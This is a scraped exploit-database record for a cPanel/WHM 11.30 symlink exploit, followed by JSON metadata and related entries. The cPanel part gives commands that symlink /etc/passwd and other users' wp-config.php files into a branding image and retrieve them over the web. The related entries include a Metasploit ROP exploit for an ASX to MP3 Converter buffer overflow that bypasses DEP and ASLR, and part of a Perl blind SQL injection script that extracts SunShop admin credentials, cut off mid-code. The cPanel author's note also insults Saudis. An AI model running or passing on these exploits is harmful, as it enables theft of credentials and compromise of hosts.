ID 1337DAY-ID-16304 Type zdt Reporter ZxH-Labs Modified 2011-06-11T00:00:00
Description
Exploit for php platform in category web applications
# cPanel X / WHM 11.30.0 (build 27) Read Files / Symlinks Bypass !!
# Version : 11.30.0 <Build 27>
# Author : ZxH-Labs
# Date : 1st OF Jun 2011
# Tested On CentOS
# Software Link : http://www.cpanel.net
# Home: 1337day.com Inj3ct0r Exploit DataBase
[+] Exploiting cPanel x ....
At First , You Must've Reseller Account < Note : We'll Not Need To 2086 Port :)
Okay Now Open SSH or File Manager Then Go to
/home/user/cpanelbranding/x3
Note : You Can Change x3 Template To Template That You're Running
Okay Now Exeute This Command To Delete File And Make Symlink To read it
# 0x01 : [email protected] [~/cpanelbranding/x3]# rm ui_sprites_bg_snap_to_smallest_width.png
# 0x02 : [email protected] [~/cpanelbranding/x3]# ln -s /etc/passwd ui_sprites_bg_snap_to_smallest_width.png
The Second Will Work Successfuly Without Any Problem'z !
Okay .. Now If You Want to Read Another File .. So You've To Check Files If You can Read it or No
So .. Execute This Command :
# 0x021 : [email protected] [~/]# ls -dl /home/*/public_html/ | grep drwxr-xr-x
You'll Get Some Path'z .. So You Can Read it Easily
# 0x03 : [email protected] [~/cpanelbranding/x3]# ln -s /home/user/public_html/wp-config.php sprites_bg_snap_to_smallest_width.png
Note : /home/user/public_html Must be Chmoded 755 / drwxr-xr-x
[+] Reading Data From cPanel X ...
Okay .. We've Finished The First Part .. Now We Want To Read Files / Symlinks !
Okay Now Go 2 cPanel X
# 0x01 : http://domain.com/net/..etc:2082
# 0x02 : http://ip:2082
# 0x03 : https://domain.com/net/..etc:2082
# 0x04 : https://ip:2082
Now Show Source And Search About "ui_sprites_bg_snap_to_smallest_width.png"
You'll See This
"("/cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png");}#ui-aqua-hd-bg{background-position:"
Now Add The Path To Your cPanel To Get File
[+] Full Exploit of cPanel X ...
Now You'll Open This Link
# 0x01 : http://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
# 0x02 : http://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
# 0x03 : https://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
# 0x04 : https://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png
[+] Note For All
We All Have More And More exploits For cPanel X But I Want You 2 Know That All exploit'z Will Not bypass Forbidden .. Only if file has 755 Permission
However I Hate Lamer'z :) .. Especially Saudi'z Lamer'z !
./b0x-j0
[+] Greet'z 2 All Friend'z and 1337day.com (Inj3ct0r Team)
# 0day.today [2018-01-01] #
{"hash": "606bd01f3f9dc175e6e2d093b5d37c42cec827f1d4caec59b757d0d644e44d79", "id": "1337DAY-ID-16304", "lastseen": "2018-01-01T09:12:36", "viewCount": 3, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "ef50bdf77f5c5c3fac601c22cd80135e", "key": "href"}, {"hash": "b4760f6282eb08cdd1cadfa8bb6b08ad", "key": "modified"}, {"hash": "b4760f6282eb08cdd1cadfa8bb6b08ad", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "158112d00a788f02b7c69cbbfa6aefb1", "key": "reporter"}, {"hash": "e6583e5dc0f387c5d7d78cb2a7003572", "key": "sourceData"}, {"hash": "0717ed3f5f6a24c809d264952ec23a2c", "key": "sourceHref"}, {"hash": "5144edf7e7aa194e068326d9a7574770", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-13319", "1337DAY-ID-2086"]}], "modified": "2018-01-01T09:12:36"}, "vulnersScore": 5.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16304", "description": "Exploit for php platform in category web applications", "title": "cPanel X / WHM 11.30.0 (build 27) Read Files / Symlinks Bypass", "history": [{"bulletin": {"hash": "5fc17f91b3635886830f656a25d24d9288df331c10c0c8e8f16695e09245239a", "id": "1337DAY-ID-16304", "lastseen": "2016-04-20T01:07:46", "enchantments": {"score": {"value": 5.5, "modified": "2016-04-20T01:07:46"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "158112d00a788f02b7c69cbbfa6aefb1", "key": "reporter"}, {"hash": "b4760f6282eb08cdd1cadfa8bb6b08ad", "key": "published"}, {"hash": "d882e0bbdb267aed8726ff55f8bf56e0", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "eabd9a7754c94655a9d28616b165d61d", "key": "sourceData"}, {"hash": "5144edf7e7aa194e068326d9a7574770", "key": "title"}, {"hash": "5b49f2164ef181b5fd4edaf602632bbf", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "b4760f6282eb08cdd1cadfa8bb6b08ad", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/16304", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "cPanel X / WHM 11.30.0 (build 27) Read Files / Symlinks Bypass", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "# cPanel X / WHM 11.30.0 (build 27) Read Files / Symlinks Bypass !!\r\n# Version : 11.30.0 <Build 27>\r\n# Author : ZxH-Labs\r\n# Date : 1st OF Jun 2011\r\n# Tested On CentOS \r\n# Software Link : http://www.cpanel.net\r\n# Home: 1337day.com Inj3ct0r Exploit DataBase\r\n\r\n[+] Exploiting cPanel x .... \r\n\r\nAt First , You Must've Reseller Account < Note : We'll Not Need To 2086 Port :)\r\nOkay Now Open SSH or File Manager Then Go to\r\n \r\n /home/user/cpanelbranding/x3\r\n\r\n\r\nNote : You Can Change x3 Template To Template That You're Running \r\nOkay Now Exeute This Command To Delete File And Make Symlink To read it \r\n\r\n# 0x01 : z1d@dns.j0 [~/cpanelbranding/x3]# rm ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x02 : z1d@dns.j0 [~/cpanelbranding/x3]# ln -s /etc/passwd ui_sprites_bg_snap_to_smallest_width.png\r\n\r\nThe Second Will Work Successfuly Without Any Problem'z !\r\nOkay .. Now If You Want to Read Another File .. So You've To Check Files If You can Read it or No \r\nSo .. Execute This Command :\r\n\r\n# 0x021 : z1d@dns.j0 [~/]# ls -dl /home/*/public_html/ | grep drwxr-xr-x\r\n\r\nYou'll Get Some Path'z .. So You Can Read it Easily \r\n\r\n# 0x03 : z1d@dns.j0 [~/cpanelbranding/x3]# ln -s /home/user/public_html/wp-config.php sprites_bg_snap_to_smallest_width.png\r\nNote : /home/user/public_html Must be Chmoded 755 / drwxr-xr-x\r\n\r\n[+] Reading Data From cPanel X ...\r\n\r\nOkay .. We've Finished The First Part .. Now We Want To Read Files / Symlinks !\r\nOkay Now Go 2 cPanel X \r\n\r\n# 0x01 : http://domain.com/net/..etc:2082\r\n# 0x02 : http://ip:2082\r\n# 0x03 : https://domain.com/net/..etc:2082\r\n# 0x04 : https://ip:2082\r\n\r\nNow Show Source And Search About \"ui_sprites_bg_snap_to_smallest_width.png\" \r\nYou'll See This\r\n\"(\"/cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\");}#ui-aqua-hd-bg{background-position:\"\r\nNow Add The Path To Your cPanel To Get File\r\n\r\n[+] Full Exploit of cPanel X ...\r\n\r\nNow You'll Open This Link\r\n\r\n# 0x01 : http://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x02 : http://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x03 : https://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x04 : https://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n\r\n\r\n[+] Note For All \r\n\r\nWe All Have More And More exploits For cPanel X But I Want You 2 Know That All exploit'z Will Not bypass Forbidden .. Only if file has 755 Permission \r\nHowever I Hate Lamer'z :) .. Especially Saudi'z Lamer'z !\r\n\r\n./b0x-j0\r\n\r\n[+] Greet'z 2 All Friend'z and 1337day.com (Inj3ct0r Team)\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2011-06-11T00:00:00", "references": [], "reporter": "ZxH-Labs", "modified": "2011-06-11T00:00:00", "href": "http://0day.today/exploit/description/16304"}, "lastseen": "2016-04-20T01:07:46", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "# cPanel X / WHM 11.30.0 (build 27) Read Files / Symlinks Bypass !!\r\n# Version : 11.30.0 <Build 27>\r\n# Author : ZxH-Labs\r\n# Date : 1st OF Jun 2011\r\n# Tested On CentOS \r\n# Software Link : http://www.cpanel.net\r\n# Home: 1337day.com Inj3ct0r Exploit DataBase\r\n\r\n[+] Exploiting cPanel x .... \r\n\r\nAt First , You Must've Reseller Account < Note : We'll Not Need To 2086 Port :)\r\nOkay Now Open SSH or File Manager Then Go to\r\n \r\n /home/user/cpanelbranding/x3\r\n\r\n\r\nNote : You Can Change x3 Template To Template That You're Running \r\nOkay Now Exeute This Command To Delete File And Make Symlink To read it \r\n\r\n# 0x01 : [email\u00a0protected] [~/cpanelbranding/x3]# rm ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x02 : [email\u00a0protected] [~/cpanelbranding/x3]# ln -s /etc/passwd ui_sprites_bg_snap_to_smallest_width.png\r\n\r\nThe Second Will Work Successfuly Without Any Problem'z !\r\nOkay .. Now If You Want to Read Another File .. So You've To Check Files If You can Read it or No \r\nSo .. Execute This Command :\r\n\r\n# 0x021 : [email\u00a0protected] [~/]# ls -dl /home/*/public_html/ | grep drwxr-xr-x\r\n\r\nYou'll Get Some Path'z .. So You Can Read it Easily \r\n\r\n# 0x03 : [email\u00a0protected] [~/cpanelbranding/x3]# ln -s /home/user/public_html/wp-config.php sprites_bg_snap_to_smallest_width.png\r\nNote : /home/user/public_html Must be Chmoded 755 / drwxr-xr-x\r\n\r\n[+] Reading Data From cPanel X ...\r\n\r\nOkay .. We've Finished The First Part .. Now We Want To Read Files / Symlinks !\r\nOkay Now Go 2 cPanel X \r\n\r\n# 0x01 : http://domain.com/net/..etc:2082\r\n# 0x02 : http://ip:2082\r\n# 0x03 : https://domain.com/net/..etc:2082\r\n# 0x04 : https://ip:2082\r\n\r\nNow Show Source And Search About \"ui_sprites_bg_snap_to_smallest_width.png\" \r\nYou'll See This\r\n\"(\"/cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\");}#ui-aqua-hd-bg{background-position:\"\r\nNow Add The Path To Your cPanel To Get File\r\n\r\n[+] Full Exploit of cPanel X ...\r\n\r\nNow You'll Open This Link\r\n\r\n# 0x01 : http://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x02 : http://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x03 : https://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x04 : https://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n\r\n\r\n[+] Note For All \r\n\r\nWe All Have More And More exploits For cPanel X But I Want You 2 Know That All exploit'z Will Not bypass Forbidden .. Only if file has 755 Permission \r\nHowever I Hate Lamer'z :) .. Especially Saudi'z Lamer'z !\r\n\r\n./b0x-j0\r\n\r\n[+] Greet'z 2 All Friend'z and 1337day.com (Inj3ct0r Team)\r\n\r\n\n\n# 0day.today [2018-01-01] #", "published": "2011-06-11T00:00:00", "references": [], "reporter": "ZxH-Labs", "modified": "2011-06-11T00:00:00", "href": "https://0day.today/exploit/description/16304"}
{"zdt": [{"lastseen": "2018-04-12T19:46:55", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2010-07-13T00:00:00", "published": "2010-07-13T00:00:00", "id": "1337DAY-ID-13319", "href": "https://0day.today/exploit/description/13319", "type": "zdt", "title": "ASX to MP3 Converter v3.1.2.1 SEH (Multiple OS, DEP and ASLR Bypass)", "sourceData": "====================================================================\r\nASX to MP3 Converter v3.1.2.1 SEH (Multiple OS, DEP and ASLR Bypass)\r\n====================================================================\r\n\r\n\r\n# Exploit Title: ASX to MP3 Converter v3.1.2.1 SEH Exploit (Multiple OS, DEP and ASLR Bypass)\r\n# Date: July 13, 2010\r\n# Author: Node\r\n# Software Link: http://www.mini-stream.net/downloads/ASXtoMP3Converter.exe\r\n# Version: Mini-Stream Software ASX to MP3 Converter v3.1.2.1.2010.03.30 Evaluation\r\n# Tested on: Windows Vista Ultimate SP1 Eng\r\n# Windows Vista Ultimate SP2 Eng\r\n# Windows XP Pro SP3 Eng\r\n# Windows XP Pro SP2 Swe\r\n# Windows XP Pro SP3 Swe\r\n# Windows XP Home SP3 Swe\r\n# CVE :\r\n# Notes: This is a proof of concept that it is possible to write ROP exploits\r\n# that are portable to different operating systems. This exploit is\r\n# using the following variables:\r\n#\r\n# 1. \"Offset\": The offset to the SEH overwrite\r\n# 2. \"Offset2\": The offset before the ROP code starts in the buffer\r\n# 3. \"K32Offset\": The offset to the kernel32 pointer on the stack\r\n# 4. \"VPOffset\": The offset to VirtualProtect() from the grabbed\r\n# kernel32 address\r\n# 5. \"ASLR\": Activates or deactivates the ASLR bypassing ROP code\r\n#\r\n# The K32Offset and VPOffset are negged hex-numbers, to evade the\r\n# null-byte problem. In the first target, K32Offset is \"0xfffebcac\"\r\n# which gets converted in the ROP code to 0x00014354 (82772), which is\r\n# how much the saved ESP address needs to be subtracted, to point to\r\n# the kernel32 address. VPOffset is how much the Kernel32 address\r\n# needs to be subtracted, to point to the VirtualProtect() function.\r\n# If \"ASLR\" is false, \"VPOffset\" will be treated as the direct,\r\n# non-negged address to VirtualProtect() in Kernel32.dll.\r\n# Code:\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n \r\n include Msf::Exploit::FILEFORMAT\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Mini-Stream Software ASX to MP3 Converter v3.1.2.1 SEH Buffer Overflow.',\r\n 'Description' => %q{\r\n This module exploits a SEH-based buffer overflow in ASX to MP3 Converter\r\n v.3.1.2.1. An attacker must send the file to victim, and the victim must open\r\n the specially crafted M3U file. This exploit is written with ROP gadgets from\r\n MSA2Mfilter03.dll and bypasses DEP on all systems including ASLR on Vista.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [ 'Node' ],\r\n 'Version' => '$Revision: 99999 $',\r\n 'Payload' =>\r\n {\r\n 'Space' => 1000,\r\n 'BadChars' => \"\\x00\\x0a\\x0d\",\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'ASX to MP3 Converter v3.1.2.1 on Windows Vista Ultimate SP1 Eng x86', \r\n {'Offset' => 43511,\r\n 'Offset2' => 16339,\r\n 'K32Offset' => 0xfffebcac,\r\n 'VPOffset' => 0xfffe4e9c,\r\n 'ASLR' => true } ],\r\n [ 'ASX to MP3 Converter v3.1.2.1 on Windows Vista Ultimate SP2 Eng x86', \r\n {'Offset' => 43511,\r\n 'Offset2' => 16339,\r\n 'K32Offset' => 0xfffebcac,\r\n 'VPOffset' => 0xfffe5bf0,\r\n 'ASLR' => true } ],\r\n [ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Pro SP3 Eng x86', \r\n {'Offset' => 43484,\r\n 'Offset2' => 16312,\r\n 'VPOffset' => 0x7c801ad4,\r\n 'ASLR' => false } ],\r\n [ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Pro SP2 Swe x86', \r\n {'Offset' => 43476,\r\n 'Offset2' => 16304,\r\n 'VPOffset' => 0x7c801ad0,\r\n 'ASLR' => false } ],\r\n [ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Pro SP3 Swe x86', \r\n {'Offset' => 43491,\r\n 'Offset2' => 16319,\r\n 'VPOffset' => 0x7c801ad4,\r\n 'ASLR' => false } ],\r\n [ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Home SP3 Swe x86', \r\n {'Offset' => 43476,\r\n 'Offset2' => 16304,\r\n 'VPOffset' => 0x7c801ad4,\r\n 'ASLR' => false } ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => '',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptString.new('FILENAME', [ true, 'The file name.', 'asx2mp3.m3u']),\r\n ], self.class)\r\n end\r\n \r\n def exploit\r\n \r\n rop = [0x1002F7B7].pack('V') # PUSH ESP # AND AL,0C # NEG EDX # NEG EAX # SBB EDX,0 # POP EBX # RETN 10\r\n rop << [0x10023315].pack('V') # ADD ESP,20 # RETN \r\n rop << \"1111\" # VirtualProtect() placeholder\r\n rop << \"2222\" #return address placeholder\r\n rop << \"3333\" #lpAddress placeholder\r\n rop << \"4444\" #dwsize placeholder\r\n rop << \"5555\" #flNewProtect placeholder\r\n rop << [0x10066005].pack('V') # lpflOldProtect writable address\r\n rop << \"A\" * 8\r\n rop << \"A\" * 16 # because of RETN 10\r\n rop << [0x1002991C].pack('V') # XOR EDX,EDX # RETN\r\n rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10\r\n rop << \"A\" * 4\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << \"A\" * 16\r\n \r\n \r\n if target['ASLR'] == true\r\n rop << [0x1002A649].pack('V') # POP EAX # RETN\r\n rop << [target['K32Offset']].pack('V')\r\n rop << [0x1005B5DB].pack('V') # NEG EAX # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x100130C4].pack('V') # MOV ECX,DWORD PTR DS:[EAX] # ADD BYTE PTR DS:[EAX],AL # POP EBP # POP EBX # RETN\r\n rop << \"A\" * 8\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << [0x1002C86A].pack('V') # SUB EAX,ECX # RETN\r\n rop << [0x10027F59].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n end\r\n \r\n rop << [0x100115AA].pack('V') # POP EBX # RETN\r\n rop << [0xffffffff].pack('V')\r\n rop << [0x10014548].pack('V') # XOR EAX,EAX # RETN\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN\r\n rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10\r\n rop << \"A\" * 4\r\n rop << [0x1002A649].pack('V') # POP EAX # RETN\r\n rop << \"A\" * 16\r\n \r\n rop << [target['VPOffset']].pack('V')\r\n \r\n if target['ASLR'] == true\r\n rop << [0x1005B5DB].pack('V') # NEG EAX # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x100130C4].pack('V') # MOV ECX,DWORD PTR DS:[EAX] # ADD BYTE PTR DS:[EAX],AL # POP EBP #POP EBX # RETN\r\n rop << \"A\" * 8\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << [0x10027F59].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # RETN\r\n rop << [0x1002C86A].pack('V') # SUB EAX,ECX # RETN\r\n end\r\n \r\n rop << [0x10019AA7].pack('V') # MOV DWORD PTR DS:[EDX],EAX # POP EDI # XOR EAX,EAX # POP EBP # ADD ESP,40 # RETN\r\n rop << \"A\" * 8\r\n rop << \"A\" * 64\r\n rop << [0x1002A649].pack('V') # POP EAX # RETN\r\n rop << [0xffff95c8].pack('V') # negged shellcode offset\r\n rop << [0x1005B5DB].pack('V') # NEG EAX # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x100130C4].pack('V') # MOV ECX,DWORD PTR DS:[EAX] # ADD BYTE PTR DS:[EAX],AL # POP EBP # POP EBX # RETN\r\n rop << \"A\" * 8\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << [0x1001451E].pack('V') # ADD EAX,ECX # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x100115AA].pack('V') # POP EBX # RETN\r\n rop << [0xffffffff].pack('V')\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN\r\n rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10\r\n rop << \"A\" * 4\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << \"A\" * 16 \r\n rop << [0x10027F59].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x100115AA].pack('V') # POP EBX # RETN\r\n rop << [0xffffffff].pack('V')\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN\r\n rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10\r\n rop << \"A\" * 4\r\n rop << [0x1002A649].pack('V') # POP EAX # RETN\r\n rop << \"A\" * 16\r\n rop << [0xfffffc18].pack('V') # 0x3e8(1000].pack('V') negged\r\n rop << [0x1005B5DB].pack('V') # NEG EAX # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x100115AA].pack('V') # POP EBX # RETN\r\n rop << [0xffffffff].pack('V')\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN\r\n rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10\r\n rop << \"A\" * 4\r\n rop << [0x1002A649].pack('V') # POP EAX # RETN\r\n rop << \"A\" * 16\r\n rop << [0xffffffc0].pack('V') # 0x40 negged\r\n rop << [0x1005B5DB].pack('V') # NEG EAX # RETN\r\n rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN\r\n rop << \"A\" * 8\r\n rop << [0x100115AA].pack('V') # POP EBX # RETN\r\n rop << [0xffffffff].pack('V')\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x10016C87].pack('V') # INC EAX # RETN\r\n rop << [0x1005B5DB].pack('V') # NEG EAX # RETN\r\n rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN\r\n rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10\r\n rop << \"A\" * 4\r\n rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN\r\n rop << \"A\" * 16\r\n rop << [0x1002FE81].pack('V') # XCHG EAX,ESP # RETN\r\n \r\n junk = rand_text_alpha_upper(target['Offset2']) #needed because of ADD ESP,4404 # RETN\r\n junktoseh = rand_text_alpha_upper(target['Offset'] - junk.length - rop.length)\r\n seh = [0x100177EA].pack('V') #ADD ESP,4404 # RETN\r\n nops = \"\\x90\" * 24\r\n shellspace = rand_text_alpha_upper(1000 - payload.encoded.length)\r\n m3ufile = junk + rop + junktoseh + seh + nops + payload.encoded + shellspace\r\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n file_create(m3ufile)\r\n \r\n end\r\n \r\nend\r\n\r\n\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/13319"}, {"lastseen": "2018-01-05T19:04:49", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-08-25T00:00:00", "published": "2007-08-25T00:00:00", "id": "1337DAY-ID-2086", "href": "https://0day.today/exploit/description/2086", "type": "zdt", "title": "SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit", "sourceData": "============================================================\r\nSunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit\r\n============================================================\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\nuse LWP::UserAgent;\r\nuse Getopt::Long;\r\n\r\nif(!$ARGV[1])\r\n{\r\n print \"\\n \\\\#'#/ \";\r\n print \"\\n (-.-) \";\r\n print \"\\n -----------------oOO---(_)---OOo------------------\";\r\n print \"\\n | SunShop v4.0 RC 6 (search) Blind SQL Injection |\";\r\n print \"\\n | k1tk4t - Indonesia |\";\r\n print \"\\n | coded by DNX |\";\r\n print \"\\n --------------------------------------------------\";\r\n print \"\\n[!] Vendor: http://www.turnkeywebtools.com\";\r\n print \"\\n[!] Bug: in the search script, u can inject sql code in the s[cid] parameter\";\r\n print \"\\n[!] Solution: install v4.0.1\";\r\n print \"\\n[!] Usage: perl sunshop.pl [Host] [Path] <Options>\";\r\n print \"\\n[!] Example: perl sunshop.pl 127.0.0.1 /shop/ -i 1 -c 10 -o 1 -t ss_admins\";\r\n print \"\\n[!] Options:\";\r\n print \"\\n -i [no] Valid User-ID, default is 1\";\r\n print \"\\n -c [no] Valid Category-ID with products, default is 1\";\r\n print \"\\n -o [no] 1 = get username (default)\";\r\n print \"\\n 2 = get password\";\r\n print \"\\n -t [name] Changes the admin table name, default is admins\";\r\n print \"\\n -p [ip:port] Proxy support\";\r\n print \"\\n\";\r\n exit;\r\n}\r\n\r\nmy $host = $ARGV[0];\r\nmy $path = $ARGV[1];\r\nmy $user = 1;\r\nmy $cat = 1;\r\nmy $column = \"username\";\r\nmy $table = \"admins\";\r\nmy %options = ();\r\nGetOptions(\\%options, \"i=i\", \"c=i\", \"o=i\", \"t=s\", \"p=s\");\r\n\r\nprint \"[!] Exploiting...\\n\";\r\n\r\nif($options{\"i\"}) { $user = $options{\"i\"}; }\r\nif($options{\"c\"}) { $cat = $options{\"c\"}; }\r\nif($options{\"o\"} && $options{\"o\"} == 2) { $column = \"password\"; }\r\nif($options{\"t\"}) { $table = $options{\"t\"}; }\r\n\r\nsyswrite(STDOUT, \"data:\", 5);\r\n\r\nfor(my $i = 1; $i <= 32; $i++)\r\n{\r\n my $found = 0;\r\n my $h = 48;\r\n while(!$found && $h <= 57)\r\n {\r\n if(istrue2($host, $path, $table, $user, $i, $h))\r\n {\r\n $found = 1;\r\n syswrite(STDOUT, chr($h), 1);\r\n }\r\n $h++;\r\n }\r\n if(!$found)\r\n {\r\n $h = 97;\r\n while(!$found && $h <= 122)\r\n {\r\n if(istrue2($host, $path, $table, $user, $i, $h))\r\n {\r\n $found = 1;\r\n syswrite(STDOUT, chr($h), 